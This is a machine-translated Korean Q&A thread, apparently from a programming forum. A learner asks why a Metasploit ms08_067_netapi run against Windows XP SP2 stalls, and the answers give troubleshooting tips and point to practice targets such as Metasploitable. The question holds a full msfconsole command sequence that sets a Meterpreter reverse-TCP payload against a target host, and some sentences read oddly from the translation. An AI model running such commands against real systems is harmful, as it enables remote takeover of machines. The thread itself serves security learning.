2013-12-18 7 views
0

구조에 대한 일반적인 이해를 얻으려면 아미티지 (Armitage)에서 시작하는 메타 스 플리트 (Metasploit) 프레임 워크를 배우고 있습니다. 나는 공격을 실행하려고하면 나는이백 트랙 5 아미티지 MSF

msf > use exploit/windows/smb/ms08_067_netapi 
msf exploit(ms08_067_netapi) > set LHOST 192.168.18.130 
LHOST => 192.168.18.130 
msf exploit(ms08_067_netapi) > set RPORT 445 
RPORT => 445 
msf exploit(ms08_067_netapi) > set LPORT 13592 
LPORT => 13592 
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.11 
RHOST => 10.0.0.11 
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp 
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER 
SMBPIPE => BROWSER 
msf exploit(ms08_067_netapi) > set TARGET 0 
TARGET => 0 
msf exploit(ms08_067_netapi) > exploit -j 
[*] Exploit running as background job. 
[*] Started reverse handler on 192.168.18.130:13592 
[*] Automatically detecting the target... 
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English 
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX) 
[*] Attempting to trigger the vulnerability... 

내가 오류를 얻을하지 않습니다 얻을하지만이 포장 마차와 악용 수행하지 않는 내가 가진 오래된 Windowx XP의 SP2를 해킹하려고했다.

답변

1

그래서 당신이 가지고있는 Windows 버전에서 익스플로잇이 작동하지 않는 것처럼 보입니다. 어쩌면 다른 것을 시도해 볼 수 있습니다. 이 악용 사례는 언제 만들어 졌습니까? Windows 버전에서 패치가 설치되지 않았는지 절대적으로 확신합니까?

다른 사람들이 작성한 악용 스크립트를 실행하여 무엇인가를 배우고 싶다면 디버깅을 시작하고 스크립트가하는 일을 이해해야합니다. Attempting to trigger the vulnerability이라고 말한 후 정확하게 스크립트가 수행중인 작업을 찾아서 작동하지 않는 이유를 찾아보십시오. 여기에 추측 할 수있는 가능성이 너무 많습니다.

0

나는 Armitage를 썼다. 여기에서 염두에 두어야 할 몇 가지 사항

  • ms08_067_netapi 신뢰할가 패치되지 않은 Windows XP 시스템에 대한 공격이다. 그러나 원격 공격으로 잘못 될 수있는 많은 것들이 있습니다. 대상 시스템을 재부트하고 호스트 기반 방화벽이 꺼져 있는지 확인하십시오. 그래도 작동하지 않으면 XP 시스템이 패치 될 수 있습니다. 어깨동울

  • 나는이 게시물의 제목이 BackTrack Linux를 나타냅니다. Armitage는 BackTrack Linux에서 더 이상 지원되지 않습니다. Metasploit Framework는 BackTrack Linux 환경을 무너 뜨리는 2013 년 4 월 주요한 종속성 변화를 겪었습니다. Kali Linux 로의 이동을 고려하십시오. 이것은 BackTrack Linux의 후속 제품입니다.

  • 이 칼리 Linux 용 Google 아미티지와 메타 스플로 잇 프레임 워크에 대한

    • 최고 "첫 번째 대상"[내가 당신에게 두 개 이상의 링크를 제공하기 위해 "명성"지점이없는이] Metasploitable

      입니다

    . 이것은 Metasploit Team에서 사용할 수있는 무료 Linux 가상 머신입니다. 여기에는 몇 가지 취약점과 잘못된 구성이 있습니다. 그것은 여기에서 다운로드 할 수있다 :

http://sourceforge.net/projects/metasploitable/files/Metasploitable2/

  • 가 나는이 아미티지 튜토리얼 시작하기 썼다. 이 튜토리얼은 Metasploitable 가상 머신에 대한 공격의 몇 가지를 안내합니다 :

http://blog.strategiccyber.com/2013/02/06/getting-started-with-armitage-and-the-metasploit-framework-2013/

+0

감사 남자, 나는 확실히 그 튜토리얼을 살펴 보겠습니다. 나는 이전에 칼리를 사용하려고 시도했으나 그것을 사용할 때 어떤 느낌이 들지 않는다. 그러나 나는 그것을 계속 시험해 볼 것을 강요하려고 노력할 것이다. – Sloth